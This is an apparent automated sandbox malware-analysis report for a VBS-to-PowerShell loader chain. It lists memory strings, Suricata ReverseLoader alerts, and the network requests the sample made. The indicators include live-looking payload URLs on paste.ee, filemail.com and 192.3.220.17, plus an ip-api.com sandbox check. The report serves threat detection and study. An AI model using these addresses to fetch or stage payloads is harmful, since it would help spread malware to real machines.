                        Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000005.00000002.1853721064.0000000005ADF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1875380332.00000000093E0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: >.CurrentSystem.Collections.IEnumerator.CurrentSystem.Collections.Generic.IEnumerator<System.Int32>.get_CurrentSystem.Collections.Generic.IEnumerator<System.Collections.Generic.KeyValuePair<System.UInt32,System.Byte[]>>.get_CurrentSystem.Collections.Generic.IEnumerator<System.Collections.Generic.KeyValuePair<System.String,System.String>>.get_CurrentSystem.Collections.Generic.IEnumerator<T>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.CustomAttribute>.get_CurrentSystem.Collections.Generic.IEnumerator<TValue>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.FieldDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MethodDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.TypeDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.EventDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.PropertyDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.ModuleRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.TypeRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MemberRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.AssemblyRef>.get_CurrentSystem.Collections.Generic.IEnumerator<System.String>.get_CurrentSystem.Collections.Generic.IEnumerator<TIn>.get_CurrentSystem.Collections.Generic.IEnumerator<Microsoft.Win32.TaskScheduler.TaskFolder>.get_CurrentSystem.Collections.Generic.IEnumerator<Microsoft.Win32.TaskScheduler.Trigger>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.CANamedArgument>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MD.IRawRow>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.AssemblyResolver. source: powershell.exe, 00000005.00000002.1853721064.0000000005ADF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1875380332.00000000093E0000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000005.00000002.1853721064.0000000005ADF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1875380332.00000000093E0000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000005.00000002.1853721064.0000000005ADF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1875380332.00000000093E0000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: `1dnlib.dotnet.mdstreamheaderdnlib.dotnet.mdtableinfodnlib.dotnetmarshalblobreaderdnlib.dotnetitypeormethoddefmicrosoft.win32.taskschedulermonthlydowtriggerdnlib.dotnet.pdbpdbwritermicrosoft.win32.taskschedulertasksettingsmicrosoft.win32.taskschedulertaskserviceversiondnlib.dotneticodedtokendnlib.dotnet.mdrawencmaprowdnlib.dotnet.writeriwritererrordnlib.dotnetimanagedentrypointdnlib.dotnetassemblylinkedresourcednlib.dotnetcablobparserexceptiondnlib.dotnetassemblyattributesdnlib.dotnet.writeritokencreatordnlib.dotnetassemblyresolveexceptiondnlib.dotnetclassorvaluetypesigdnlib.dotnetmethodsigdnlib.dotnetcmodoptsigdnlib.dotnetimplmapmicrosoft.win32.taskschedulertasktriggertypemicrosoft.win32.taskschedulertaskrightsmicrosoft.win32.taskschedulermonthsoftheyeardnlib.pedllcharacteristicsdnlib.dotnetparamattributesdnlib.dotnet.mdicolumnreadersystem.security.accesscontrolaccesscontrolextensionmicrosoft.win32.taskschedulertaskprincipalprivilegesmicrosoft.win32.taskscheduleridletriggermicrosoft.win32.taskscheduler.fluentweeklytriggerbuilderdnlib.dotnetimplmapuserdnlib.dotnet.writerdummymodulewriterlistenermicrosoft.win32.taskschedulerquicktriggertype source: powershell.exe, 00000005.00000002.1882706332.00000000095E5000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: `1microsoft.win32.taskscheduleritaskhandlerstatusdnlib.dotnet.writerchunklistbase`1dnlib.iohomednlib.dotneticustomattributednlib.dotnet.pdb.dssisymunmanagedwriter2dnlib.dotnet.writermaxstackcalculatordnlib.dotnet.pdbpdbdocumentusersmicrosoft.win32.taskscheduler.fluentmonthlytriggerbuilderdnlib.dotnet.writerhotpooldnlib.dotneteventattributesdnlib.dotnet.pdb.dsssymbolreadercreatordnlib.dotnet.writermodulewriterbasemicrosoft.win32.taskschedulerpowershellactionplatformoptiondnlib.dotnet.writerioffsetheap`1dnlib.dotnetclasslayoutuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetinterfacemarshaltypemicrosoft.win32.taskschedulertaskeventlogdnlib.dotnetmarshaltypemicrosoft.win32.taskschedulertaskfolderdnlib.dotnet.resourcesresourcereaderexceptionmicrosoft.win32.taskscheduleractioncollectiondnlib.ioioextensionsdnlib.dotnet.writerchunklist`1dnlib.dotnet.emitexceptionhandlertypednlib.dotnet.mddotnetstreamdnlib.dotnetfieldattributesdnlib.dotnetparamdefdnlib.dotnetimemberrefresolverdnlib.dotnet.writerpeheadersdnlib.dotnet.writerwin32resourceschunkmicrosoft.win32.taskschedulernotv1supportedexceptioncronfieldtypednlib.dotnet.writermethodbodychunksdnlib.dotnetcaargumentmicrosoft.win32.taskscheduleritriggeruseriddnlib.dotnetloggereventdnlib.utilsmfunc`3dnlib.dotnetsecurityactiondnlib.dotnet.pdb.dsssymbolwritercreatordnlib.ioibinaryreadermicrosoft.win32.taskschedulersessionstatechangetriggerdnlib.dotnetassemblydefdnlib.dotneticustomattributetypednlib.dotnetmemberrefresolveexceptionmicrosoft.win32.taskschedulertaskcompatibilityentrydnlib.threadingenumerableiteratealldelegate`1dnlib.dotnet.mdridlistdnlib.dotnet.resourcesresourcereadermicrosoft.win32.taskschedulertaskdefinitiondnlib.dotnet.emitcodednlib.dotnetcmodreqdsigdnlib.dotnet.pdbpdbimpltypednlib.utilsilazylist`1dnlib.dotnet.emitflowcontroldnlib.dotnetleafsigdnlib.dotnetcanamedargumentdnlib.peimagefileheaderdnlib.dotnetisignaturereaderhelperdnlib.dotnet.mdheaptypednlib.dotnetvaluearraysigdnlib.dotnettypedefuserdnlib.dotnet.writerimdtablednlib.dotnet.resourcesresourcedatacreatordnlib.dotnet.mdrawmodulerefrowdnlib.dotnet.writercor20headeroptionsdnlib.dotnettypesigdnlib.dotnetalltypeshelper<>c__5`1microsoft.win32.taskschedulermonthlytriggerdnlib.dotnetmethoddefuserdnlib.dotnet.mdmetadataheaderdnlib.dotnet.emitopcodednlib.dotnetihassemanticdnlib.dotnetinterfaceimpldnlib.dotnetitokenoperanddnlib.dotnetidnlibdefmicrosoft.win32.taskschedulercomhandleractiondnlib.dotnetfullnamecreatordnlib.dotnetimethoddecrypterdnlib.dotnet.mdrawrowequalitycomparerdnlib.threadinglistiteratealldelegate`1microsoft.win32.taskscheduleritriggerdelaydnlib.dotnetpropertysigdnlib.dotnetassemblyresolverdnlib.dotnetstrongnamesignerdnlib.dotnetfixedarraymarshaltypednlib.dotnet.pdbpdbscope source: powershell.exe, 00000005.00000002.1882706332.00000000095E5000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: `1dnlib.dotnetstandalonesiguserdnlib.dotnetihasdeclsecuritydnlib.dotnetutf8stringequalitycomparerdnlib.dotnet.pdbpdbstatednlib.dotnet.writermetadataheaderoptionsdnlib.dotnet.mdrawconstantrowdnlib.dotnetdeclsecurityusermicrosoft.win32.taskschedulertaskprincipaldnlib.dotnet.writermodulewriterexceptiondnlib.dotnet.pdbisymbolwriter2microsoft.win32.taskschedulertasksetsecurityoptionsmicrosoft.win32.taskschedulertaskeventwatcherdnlib.dotnetbyrefsigdnlib.dotnetptrsigdnlib.dotnet.mdrawtyperefrowdnlib.dotnetgenericargumentsdnlib.dotnetimemberdefdnlib.dotnetpropertyattributesdnlib.dotnettypeequalitycomparerdnlib.dotnetconstantuserdnlib.dotnet.mdraweventptrrowdnlib.dotnetimporteroptionsdnlib.dotnetfiledefuserdnlib.dotnet.writerblobheapdnlib.dotnetgenericparamconstraintuserdnlib.dotnetpublickeybasednlib.dotnetmodulesigeventfilterdnlib.dotnetaccesscheckerdnlib.dotnetclasssigdnlib.dotnetmanifestresourceattributesdnlib.threadingicancellationtokendnlib.dotnet.mdrawfieldmarshalrowdnlib.dotnet.mdstorageflagsdnlib.dotnetassemblyrefdnlib.dotneteventdefuserdnlib.dotnetmodulecontextdnlib.dotnetimportresolverdnlib.dotnetiresolutionscopednlib.dotnet.resourcesuserresourcetypednlib.dotnetmethodoverridednlib.dotnet.mdimagecor20headerdnlib.dotnet.writerstartupstubdnlib.dotnetrecursioncountermicrosoft.win32.taskscheduler.fluentbasebuilderdnlib.pervadnlib.threadingenumerableiteratedelegate`1microsoft.win32.taskschedulertaskaccessrulednlib.dotnet.writermetadataeventdnlib.dotnetiistypeormethoddnlib.dotnetmoduledefuserdnlib.dotnet.emitlocaldnlib.dotnet.resourcesbuiltinresourcedatamicrosoft.win32.taskschedulertriggercollectiondnlib.dotnetarraysigdnlib.dotnetcustomattributereaderdnlib.dotnetinterfaceimplusermicrosoft.win32.taskschedulertriggermicrosoft.codeanalysisembeddedattributednlib.dotnet.mdrawfieldlayoutrowmicrosoft.win32.taskschedulertaskprincipalprivilegednlib.utilsextensionsdnlib.dotnet.mdrawassemblyrowdnlib.dotnet.mdrawparamrowdnlib.dotnetmemberrefdnlib.dotnetihasconstantdnlib.dotnetmethodimplattributesdnlib.dotneticorlibtypesdnlib.dotnet.writermethodbodywriterdnlib.dotnetihascustomattributednlib.dotnet.emitinstructiondnlib.dotnet.mdrawtypedefrowdnlib.dotnetiscope source: powershell.exe, 00000005.00000002.1882706332.00000000095E5000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.dotnet.pdbimage_debug_directory source: powershell.exe, 00000005.00000002.1882706332.00000000095E5000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.pepeimagemicrosoft.win32.taskschedulerregistrationtriggermicrosoft.win32.taskschedulerdaysoftheweekmicrosoft.win32.taskschedulertaskrunflagsdnlib.dotnet.mdrawparamptrrowdnlib.dotnet.writerichunkdnlib.dotnet.resourcescreateresourcedatadelegatednlib.dotnet.mdrawmethodrowdnlib.dotnet.mdrawenclogrowmicrosoft.win32.taskschedulertaskeventenumeratordnlib.dotnet.writericustomattributewriterhelperdnlib.peiimageoptionalheaderdnlib.dotnet.writermodulewriterdnlib.threadingthreadsafelistcreatordnlib.dotnet.mdrawfieldrvarowdnlib.dotnet.writerhotheap20dnlib.dotnet.mdcolumnsizednlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnet.writerdeclsecuritywriterconnectiontokendnlib.dotnet.writeruniquechunklist`1microsoft.win32.taskschedulertaskrunleveldnlib.dotnettypespecdnlib.dotnet.mdrawimplmaprowdnlib.dotnet.writermodulewriteroptionsdnlib.threadingextensionsdnlib.peipeimagednlib.dotnetinvalidkeyexceptiondnlib.dotnetfileattributesmicrosoft.win32.taskschedulerlogontriggerdnlib.dotnet.mdrawgenericparamconstraintrowdnlib.dotnet.writerhotheap40dnlib.dotnetmodulerefdnlib.dotnetsigcomparerdnlib.dotnet.writermetadatadnlib.dotnet.pdbsequencepointdnlib.dotnet.pdb.managedpdbexceptiondnlib.peimagentheadersdnlib.pemachinednlib.peimageoptionalheader64dnlib.dotnettypedefdnlib.dotnetvaluetypesigdnlib.dotnetbytearrayequalitycomparerdnlib.dotnetpropertydefuserdnlib.dotnet.writertablesheapdnlib.dotnet.mdrawmemberrefrowdnlib.dotnet.writerhottablednlib.dotnetconstantdnlib.dotnetassemblydefuserdnlib.dotnetmodulerefuserdnlib.dotnetexportedtypednlib.iofileoffsetdnlib.dotnet.mdrawfieldptrrowdnlib.dotnet.writerimportaddresstablednlib.dotnet.mdrawmethodptrrowdnlib.dotnet.mdrawinterfaceimplrowdnlib.dotnet.emitmethodutilsdnlib.dotnetcallingconventionsigdnlib.peimageoptionalheader32dnlib.dotnet.emitiinstructionoperandresolverdnlib.dotnetcustomattributecollectionmicrosoft.win32.taskschedulertsnotsupportedexceptiondnlib.dotnetitypednlib.dotnettypedeforrefsigdnlib.w32resourcesresourcedirectoryuserdnlib.dotnet.emitinstructionprintermicrosoft.win32.taskschedulerwildcardmicrosoft.win32.taskschedulercustomtriggerdnlib.w32resourcesresourcedirectorypemicrosoft.win32.taskscheduler.fluentintervaltriggerbuildermicrosoft.win32.taskschedulerresourcereferencevaluednlib.dotnet.pdb.managedsymbolreadercreatordnlib.dotnet.mdcodedtokendnlib.dotnetassemblynameinfodnlib.dotnet.emitstackbehaviourmicrosoft.win32.taskschedulertaskstatednlib.dotnet.mdrawmodulerowdnlib.dotnet.pdb.dssisymunmanageddocumentwritermicrosoft.win32.taskschedulertaskcompatibilitydnlib.dotnet.emitinvalidmethodexceptiondnlib.dotnetnullresolverdnlib.dotnetdeclsecuritydnlib.dotnet.emitdynamicmethodbodyreaderdnlib.dotnet.mdrawcustomattributerowdnlib.dotnet.resourcesresourceelementdnlib.dotnet.writerrelocdirectorydnlib.w32resourceswin32resourcespednlib.dotnetsigcompareroptionsdnlib.dotnet.mdrawmethodimplrowdnlib.dotnetsafearraymarshaltypednlib.dotnet.mdrawclasslayoutrowdnlib.dotnet.writerpeheadersoptionsmicrosoft.win32.taskschedulernamedvaluecollecti
                        Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000005.00000002.1853721064.0000000005ADF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1875380332.00000000093E0000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000005.00000002.1882706332.00000000095E5000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: `1taskprincipalprivilegesenumeratordnlib.dotnetifullnamemicrosoft.win32.taskscheduler.fluentactionbuilderdnlib.dotnet.mdmdheaderruntimeversionmicrosoft.win32.taskschedulerrunningtaskcollectiondnlib.dotnetframeworkredirectelemdnlib.dotnet.emitistringresolverdnlib.dotnet.writernativemodulewriteroptionsdnlib.dotnet.pdb.managedpdbreadermicrosoft.win32.taskschedulertaskfoldercollectiondnlib.dotnetcallingconventionmicrosoft.win32.taskschedulertaskfoldersnapshotdnlib.iotoolsdnlib.dotnetiassemblydnlib.dotnetparamdefuserdnlib.dotnet.mdrawdeclsecurityrowdnlib.dotnet.writernativemodulewriterdnlib.dotnetmethodbasesig<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>cmicrosoft.win32.taskschedulerrepetitionpatterndnlib.dotnetiassemblyreffindermicrosoft.win32.taskschedulericalendartriggerdnlib.dotnetmanifestresourcednlib.dotnet.writerimportdirectorymicrosoft.win32.taskschedulertaskservicednlib.dotnet.mdrawpropertymaprowmicrosoft.win32.taskschedulertaskinstancespolicymicrosoft.win32.taskscheduleritaskhandlerdnlib.dotnetparameterdnlib.dotnetitypedeffinderdnlib.dotnetsignaturereadermicrosoft.win32.taskschedulerboottriggerdnlib.dotnet.mdrawgenericparamrowdnlib.dotnet.writerimetadatalistenerdnlib.dotneteventequalitycomparerdnlib.dotnet.mdcolumninfodnlib.dotnetfieldsigdnlib.ioiimagestreamdnlib.threadinglistiteratedelegate`1dnlib.dotnetassemblynamecomparerflagsdnlib.dotnet.mdrawmethodsemanticsrowdnlib.dotnetpublickeydnlib.dotnetgenericsig source: powershell.exe, 00000005.00000002.1882706332.00000000095E5000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.dotnet.pdbsymbolwritercreator source: powershell.exe, 00000005.00000002.1882706332.00000000095E5000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000005.00000002.1882706332.00000000095E5000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000005.00000002.1853721064.0000000005ADF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1875380332.00000000093E0000.00000004.08000000.00040000.00000000.sdmp

                        Spreading

                        Source: Yara match File source: C:\Windows\Temp\octupole.vbs, type: DROPPED

                        Software Vulnerabilities

                        Source: C:\Windows\SysWOW64\wscript.exe Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

                        Networking

                        Source: Network traffic Suricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound : 192.3.220.17:80 -> 192.168.2.4:49735
                        Source: Network traffic Suricata IDS: 2057635 - Severity 1 - ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound : 192.3.220.17:80 -> 192.168.2.4:49735
                        Source: Network traffic Suricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 192.3.220.17:80 -> 192.168.2.4:49735
                        Source: Network traffic Suricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 142.215.209.72:443 -> 192.168.2.4:49734
                        Source: C:\Windows\SysWOW64\wscript.exe Network Connect: 23.186.113.60 443
                        Source: unknown DNS query: name: paste.ee
                        Source: global traffic HTTP traffic detected: GET /api/file/get?filekey=ESYTiTR3O03E5qrMnIyyWtYf5OMFU0makxMu0ePqRRJNicNjC36a8T2jGfWT6FEBj5s&pk_vid=342803d1cc4e3b80174066705080a5ef HTTP/1.1 Host: 1007.filemail.com Connection: Keep-Alive
                        Source: global traffic HTTP traffic detected: GET /base64444444444444444444444444444.txt HTTP/1.1 Host: 192.3.220.17 Connection: Keep-Alive
                        Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
                        Source: Joe Sandbox View IP Address: 23.186.113.60
                        Source: Joe Sandbox View IP Address: 208.95.112.1
                        Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS
                        Source: Joe Sandbox View JA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
                        Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                        Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                        Source: unknown DNS query: name: ip-api.com
                        Source: global traffic HTTP traffic detected: GET /d/rrpcUbe1/0 HTTP/1.1 Accept: */* Accept-Language: en-ch Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: paste.ee Connection: Keep-Alive
                        Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.32
                        Source: unknown TCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknown TCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknown TCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknown TCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknown TCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknown TCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknown TCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknown TCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknown TCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknown TCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknown TCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknown TCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknown TCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknown TCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknown TCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknown TCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknown TCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknown TCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknown TCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknown TCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknown TCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknown TCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknown TCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknown TCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknown TCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknown TCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknown TCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknown TCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknown TCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknown TCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknown TCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknown TCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknown TCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknown TCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknown TCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknown TCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknown TCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknown TCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknown TCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknown TCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknown TCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknown TCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknown TCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknown TCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknown TCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknown TCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknown TCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknown TCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: unknown TCP traffic detected without corresponding DNS query: 192.3.220.17
                        Source: global traffic HTTP traffic detected: GET /d/rrpcUbe1/0 HTTP/1.1 Accept: */* Accept-Language: en-ch Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: paste.ee Connection: Keep-Alive
                        Source: global traffic HTTP traffic detected: GET /api/file/get?filekey=ESYTiTR3O03E5qrMnIyyWtYf5OMFU0makxMu0ePqRRJNicNjC36a8T2jGfWT6FEBj5s&pk_vid=342803d1cc4e3b80174066705080a5ef HTTP/1.1 Host: 1007.filemail.com Connection: Keep-Alive
                        Source: global traffic HTTP traffic detected: GET /base64444444444444444444444444444.txt HTTP/1.1 Host: 192.3.220.17 Connection: Keep-Alive
                        Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
                        Source: global traffic DNS traffic detected: DNS query: paste.ee
                        Source: global traffic DNS traffic detected: DNS query: 1007.filemail.com
                        Source: global traffic DNS traffic detected: DNS query: ip-api.com
                        Source: global traffic DNS traffic detected: DNS query: tse1.mm.bing.net
                        Source: powershell.exe, 00000005.00000002.1845461961.0000000004D11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://192.3.220.17
                        Source: powershell.exe, 00000005.00000002.1845461961.0000000004D11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://192.3.220.17/base64444444444444444444444444444.txt
                        Source: MSBuild.exe, 00000008.00000002.2936900255.00000000029E1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.2936900255.0000000002AC5000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.2936900255.0000000002AAA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ip-api.com
                        Source: powershell.exe, 00000005.00000002.1853721064.0000000005D1E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.2936900255.00000000029E1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.2934590223.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.2936900255.0000000002AAA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ip-api.com/line/?fields=hosting
                        Source: powershell.exe, 00000005.00000002.1853721064.000000000599B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
                        Source: powershell.exe, 00000005.00000002.1845461961.0000000004A89000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
                        Source: powershell.exe, 00000005.00000002.1845461961.0000000004931000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.2936900255.00000000029E1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.2936900255.0000000002AAA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: powershell.exe, 00000005.00000002.1845461961.0000000004A89000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                        Source: powershell.exe, 00000005.00000002.1845461961.0000000004A89000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://1007.filemail.com
                        Source: powershell.exe, 00000005.00000002.1845461961.0000000004A89000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://1007.filemail.com/api/file/get?filekey=ESYTiTR3O03E5qrMnIyyWtYf5OMFU0makxMu0ePqRRJNicNjC36a8
                        Source: powershell.exe, 00000005.00000002.1853721064.0000000005D1E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.2934590223.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://account.dyn.com/
                        Source: powershell.exe, 00000005.00000002.1845461961.0000000004931000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lBkq
                        Source: wscript.exe, 00000003.00000003.1739105346.0000000002B2D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1738030076.0000000002B4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1739589814.0000000004F03000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1743533343.0000000002B2D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://analytics.paste.ee
                        Source: wscript.exe, 00000003.00000003.1739105346.0000000002B2D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1738030076.0000000002B4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1739589814.0000000004F03000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1743533343.0000000002B2D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://analytics.paste.ee;
                        Source: wscript.exe, 00000003.00000003.1739105346.0000000002B2D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1738030076.0000000002B4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1739589814.0000000004F03000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1743533343.0000000002B2D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdnjs.cloudflare.com
                        Source: wscript.exe, 00000003.00000003.1739853725.0000000002AC2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1743533343.0000000002B2D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdnjs.cloudflare.com;
                        Source: powershell.exe, 00000005.00000002.1853721064.000000000599B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
                        Source: powershell.exe, 00000005.00000002.1853721064.000000000599B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
                        Source: powershell.exe, 00000005.00000002.1853721064.000000000599B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
                        Source: wscript.exe, 00000003.00000003.1739853725.0000000002AC2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1743533343.0000000002B2D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fonts.googleapis.com
                        Source: wscript.exe, 00000003.00000003.1739853725.0000000002AC2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1743533343.0000000002B2D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fonts.gstatic.com;
                        Source: powershell.exe, 00000005.00000002.1845461961.0000000004A89000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
